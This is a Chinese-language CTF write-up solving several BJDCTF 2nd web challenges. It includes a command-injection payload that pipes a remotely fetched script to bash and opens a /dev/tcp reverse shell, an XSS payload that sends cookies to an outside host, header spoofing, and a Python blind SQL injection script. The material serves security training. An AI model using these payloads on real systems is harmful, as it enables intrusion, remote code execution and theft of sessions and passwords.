BJDCTF 2nd

[BJDCTF 2nd]fake google

注释提示ssti，直接打，参考链接：https://gitee.com/vulhub/vulhub/tree/master/flask/ssti

[BJDCTF 2nd]old-hack

根据网站图标得知为thinkphp，直接打，参考链接：https://gitee.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce

[BJDCTF 2nd]elementmaster

脑洞题，参考出题笔记：https://www.gem-love.com/ctf/2097.html

[BJDCTF 2nd]Schrödinger

脑洞题，参考出题笔记：https://www.gem-love.com/ctf/2097.html

[BJDCTF 2nd]文件探测

参考链接：https://www.gem-love.com/ctf/2097.html

[BJDCTF 2nd]假猪套天下第一

只要用户名不是admin登录上去抓包看到提示L0g1n.php
打开抓包改head头，
time=161275398400000000
Via:y1ng.vip
Client-ip或者x-forwarded-for:127.0.0.1
Referer:gem-love.com
User-Agent:Commodore 64
From: root@gem-love.com
得到base64编码的flag

[BJDCTF 2nd]duangShell

扫目录扫到/.index.php.swp，下载下来vi -r index.php.swp恢复源码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>give me a girl</title>
</head>
<body>
    <center><h1>珍爱网</h1></center>
</body>
</html>
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
    die("where is P3rh4ps's girl friend ???");
} else {
    $girl = $_POST['girl_friend'];
    if (preg_match('/\>|\\\/', $girl)) {
        die('just girl');
    } else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {
        echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";
    } else {
        //duangShell~~~~
        exec($girl);
    }
}

post 一个 girl_friend 然后绕过一些正则比配之后就 exec()，但是exec() 和 system() 不同，exec() 无回显，所以首选反弹 shell，正好 curl 没 ban，
payload：girl_friend=curl http://ip/shell.txt|bash
shell.txt：bash -i >& /dev/tcp/[ip]/[port] 0>&1
然后find / -name flag找到flag

[BJDCTF 2nd]xss之光

dirsearch扫目录发现git文件泄露用，GitHack获取源码

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

原生类构造payload：

<?php
$a = serialize(new Exception("<script>window.location.href='URL'+document.cookie</script>"));
echo urlencode($a);
?>
//输出：O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A115%3A%22%3Cscript%3Ewindow.location.href%3D%27http%3A%2F%2Facb23080-b56b-44a8-a4bc-63bec0ce5b81.node3.buuoj.cn%2F%27%2Bdocument.cookie%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A27%3A%22D%3A%5Cphpstudy_pro%5CWWW%5Ctry.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

在cookie中获取flag
参考链接：https://blog.csdn.net/qq_45521281/article/details/105812056

[BJDCTF 2nd]简单注入

从robots.txt得到hint在hint.txt:
hint.txt:

select * from users where username='$_POST["username"]' and password='$_POST["password"]';

可以看出输入的用户名和密码没有任何过滤直接拼接到sql语句，第二个单引号'可以用admin\转义掉，然后后面就可以写入恶意语句，语句就变为：

select * from users where username='admin and password=' 恶意语句#';

注入payload:^(ascii(substr(password,1,1))>1000)#
根据返回信息不同判断为布尔盲注

import requests
url = 'http://14371858-66d2-4093-a4ba-bb14bedeeb68.node3.buuoj.cn/index.php'
passwd = ''
for i in range(1,20):
    print(i)
    left = 31
    right = 128
    mid = left + ((right - left)>>1)
    while left < right:
        data = {
            'username':'admin\\',
            'password':'^(ascii(substr(password,{},1))>{})#'.format(i,mid)
            }
        r = requests.post(url = url,data = data)
        if 'BJD needs to be stronger' not in r.text:
            left = mid + 1
        elif 'BJD needs to be stronger'  in r.text:
            right = mid 
        mid = left + ((right-left)>>1)
    passwd += chr(mid)
    print(str(mid),passwd)

注入出来密码为OhyOuFOuNdit，登录得到flag